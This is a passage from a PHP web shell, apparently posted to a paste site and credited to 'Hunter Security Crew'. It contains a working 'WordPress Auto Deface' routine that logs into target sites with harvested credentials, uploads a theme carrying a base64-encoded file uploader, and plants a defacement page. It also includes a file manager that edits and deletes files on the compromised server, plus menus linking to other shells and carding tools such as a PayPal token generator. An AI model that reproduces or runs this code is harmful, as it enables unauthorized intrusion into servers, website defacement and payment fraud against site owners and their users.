  3973. mysql_close($conn);
  3974. } else {
  3975. $site = "$target/wp-login.php";
  3976. $site2 = "$target/wp-admin/theme-install.php?upload";
  3977. $b1 = anucurl($site2);
  3978. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3979. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3980. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3981. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3982. $www = "m.php";
  3983. $fp5 = fopen($www,"w");
  3984. fputs($fp5,$upload3);
  3985. $post2 = array(
  3986. "_wpnonce" => "$anu2",
  3987. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3988. "themezip" => "@$www",
  3989. "install-theme-submit" => "Install Now",
  3990. );
  3991. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3992. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3993. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3994. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3995. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3996. curl_setopt($ch, CURLOPT_POST, 1);
  3997. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3998. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3999. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4000. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4001. $data3 = curl_exec($ch);
  4002. curl_close($ch);
  4003. $y = date("Y");
  4004. $m = date("m");
  4005. $namafile = "id.php";
  4006. $fpi = fopen($namafile,"w");
  4007. fputs($fpi,$script);
  4008. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4009. curl_setopt($ch6, CURLOPT_POST, true);
  4010. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4011. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4012. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4013. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4014. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4015. $postResult = curl_exec($ch6);
  4016. curl_close($ch6);
  4017. $as = "$target/k.php";
  4018. $bs = anucurl($as);
  4019. if(preg_match("#$script#is", $bs)) {
  4020. echo "[+] <font color='lime'>Sukses</font><br>";
  4021. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4022. } else {
  4023. echo "[-] <font color='red'>Gagal</font><br>";
  4024. echo "[!!] coba aja manual: <br>";
  4025. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4026. echo "[+] username: <font color=lime>$user</font><br>";
  4027. echo "[+] password: <font color=lime>$pass</font><br><br>";
  4028. }
  4029. mysql_close($conn);
  4030. }
  4031. }
  4032. } else {
  4033. echo "<center><h1>WordPress Auto Deface V.2</h1>
  4034. <form method='post'>
  4035. Link Config: <br>
  4036. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4037. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Hunter Security Crew' required><br>
  4038. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4039. </form></center>";
  4040. }
  4041. } elseif($_GET['act'] == 'newfile') {
  4042. if($_POST['new_save_file']) {
  4043. $newfile = htmlspecialchars($_POST['newfile']);
  4044. $fopen = fopen($newfile, "a+");
  4045. if($fopen) {
  4046. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4047. } else {
  4048. $act = "<font color=red>permission denied</font>";
  4049. }
  4050. }
  4051. echo $act;
  4052. echo "<form method='post'>
  4053. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4054. <input type='submit' name='new_save_file' value='Submit'>
  4055. </form>";
  4056. } elseif($_GET['act'] == 'newfolder') {
  4057. if($_POST['new_save_folder']) {
  4058. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4059. if(!mkdir($new_folder)) {
  4060. $act = "<font color=red>permission denied</font>";
  4061. } else {
  4062. $act = "<script>window.location='?dir=".$dir."';</script>";
  4063. }
  4064. }
  4065. echo $act;
  4066. echo "<form method='post'>
  4067. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4068. <input type='submit' name='new_save_folder' value='Submit'>
  4069. </form>";
  4070. } elseif($_GET['act'] == 'rename_dir') {
  4071. if($_POST['dir_rename']) {
  4072. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4073. if($dir_rename) {
  4074. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4075. } else {
  4076. $act = "<font color=red>permission denied</font>";
  4077. }
  4078. echo "".$act."<br>";
  4079. }
  4080. echo "<form method='post'>
  4081. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4082. <input type='submit' name='dir_rename' value='rename'>
  4083. </form>";
  4084. } elseif($_GET['act'] == 'delete_dir') {
  4085. function Delete($path)
  4086. {
  4087. if (is_dir($path) === true)
  4088. {
  4089. $files = array_diff(scandir($path), array('.', '..'));
  4090. foreach ($files as $file)
  4091. {
  4092. Delete(realpath($path) . '/' . $file);
  4093. }
  4094. return rmdir($path);
  4095. }
  4096. else if (is_file($path) === true)
  4097. {
  4098. return unlink($path);
  4099. }
  4100. return false;
  4101. }
  4102. $delete_dir = Delete($dir);
  4103. if($delete_dir) {
  4104. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4105. } else {
  4106. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4107. }
  4108. echo $act;
  4109. } elseif($_GET['act'] == 'view') {
  4110. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4111. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4112. } elseif($_GET['act'] == 'edit') {
  4113. if($_POST['save']) {
  4114. $save = file_put_contents($_GET['file'], $_POST['src']);
  4115. if($save) {
  4116. $act = "<font color=lime>Saved!</font>";
  4117. } else {
  4118. $act = "<font color=red>permission denied</font>";
  4119. }
  4120. echo "".$act."<br>";
  4121. }
  4122. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4123. echo "<form method='post'>
  4124. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4125. <input type='submit' value='Save' name='save' style='width: 500px;'>
  4126. </form>";
  4127. } elseif($_GET['act'] == 'rename') {
  4128. if($_POST['do_rename']) {
  4129. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4130. if($rename) {
  4131. $act = "<script>window.location='?dir=".$dir."';</script>";
  4132. } else {
  4133. $act = "<font color=red>permission denied</font>";
  4134. }
  4135. echo "".$act."<br>";
  4136. }
  4137. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4138. echo "<form method='post'>
  4139. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4140. <input type='submit' name='do_rename' value='rename'>
  4141. </form>";
  4142. } elseif($_GET['act'] == 'delete') {
  4143. $delete = unlink($_GET['file']);
  4144. if($delete) {
  4145. $act = "<script>window.location='?dir=".$dir."';</script>";
  4146. } else {
  4147. $act = "<font color=red>permission denied</font>";
  4148. }
  4149. echo $act;
  4150. }else {
  4151. if(is_dir($dir) == true) {
  4152. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4153. <tr>
  4154. <th class="th_home"><center>Name</center></th>
  4155. <th class="th_home"><center>Type</center></th>
  4156. <th class="th_home"><center>Size</center></th>
  4157. <th class="th_home"><center>Last Modified</center></th>
  4158. <th class="th_home"><center>Permission</center></th>
  4159. <th class="th_home"><center>Action</center></th>
  4160. </tr>';
  4161. $scandir = scandir($dir);
  4162. foreach($scandir as $dirx) {
  4163. $dtype = filetype("$dir/$dirx");
  4164. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4165. if(!is_dir("$dir/$dirx")) continue;
  4166. if($dirx === '..') {
  4167. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4168. } elseif($dirx === '.') {
  4169. $href = "<a href='?dir=$dir'>$dirx</a>";
  4170. } else {
  4171. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4172. }
  4173. if($dirx === '.' || $dirx === '..') {
  4174. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4175. } else {
  4176. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4177. }
  4178. echo "<tr>";
  4179. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4180. echo "<td class='td_home'><center>$dtype</center></td>";
  4181. echo "<td class='td_home'><center>-</center></th>";
  4182. echo "<td class='td_home'><center>$dtime</center></td>";
  4183. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4184. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4185. }
  4186. echo "</tr>";
  4187. foreach($scandir as $file) {
  4188. $ftype = filetype("$dir/$file");
  4189. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4190. $size = filesize("$dir/$file")/1024;
  4191. $size = round($size,3);
  4192. if($size > 1024) {
  4193. $size = round($size/1024,2). 'MB';
  4194. } else {
  4195. $size = $size. 'KB';
  4196. }
  4197. if(!is_file("$dir/$file")) continue;
  4198. echo "<tr>";
  4199. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4200. echo "<td class='td_home'><center>$ftype</center></td>";
  4201. echo "<td class='td_home'><center>$size</center></td>";
  4202. echo "<td class='td_home'><center>$ftime</center></td>";
  4203. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4204. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4205. }
  4206. echo "</tr></table>";
  4207. } else {
  4208. echo "<font color=red>can't open directory</font>";
  4209. }
  4210. }
  4211. echo "<center><hr><form>
  4212. <select onchange='if (this.value) window.open(this.value);'>
  4213. <option selected='selected' value=''> Summoner Tools </option>
  4214. <option value='$ling=wso'>WSO 2.8.1</option>
  4215. <option value='$ling=injection'>1n73ction v3</option>
  4216. <option value='$ling=wk'>WHMCS Killer</option>
  4217. <option value='$ling=adminer'>Adminer</option>
  4218. <option value='$ling=b374k'>b374k Shell</option>
  4219. <option value='$ling=b374k323'>b374k 3.2</option>
  4220. <option value='$ling=bh'>BlackHat Shell</option>
  4221. <option value='$ling=dhanus'>Dhanush Shell</option>
  4222. <option value='$ling=r57'>R57 Shell</option>
  4223. <option value='$ling=encodedecode'>Encode Decode</option>
  4224. <option value='$ling=r57'>R57 Shell</option>
  4225. </select>
  4226. <select onchange='if (this.value) window.open(this.value);'>
  4227. <option selected='selected' value=''> Carding Tools </option>
  4228. <option value='$ling=extractor'>DB Email Extractor</option>
  4229. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  4230. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  4231. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  4232. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  4233. <option value='$ling=mailer'>Mailer</option>
  4234. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4235. </select>
  4236. <noscript><input type='submit' value='Submit'></noscript>
  4237. </form>Copyright &copy; ".date("Y")." - <a href='#' target='_blank'><font color=lime></font></a> Shell Recoded By <a href='https://www.facebook.com/hunter404sec/' target='_BLANK'><font color=lime>Hunter Security Crew</a></font></center>";
  4238. ?>
  4239. </html>
Add Comment
Please, Sign In to add comment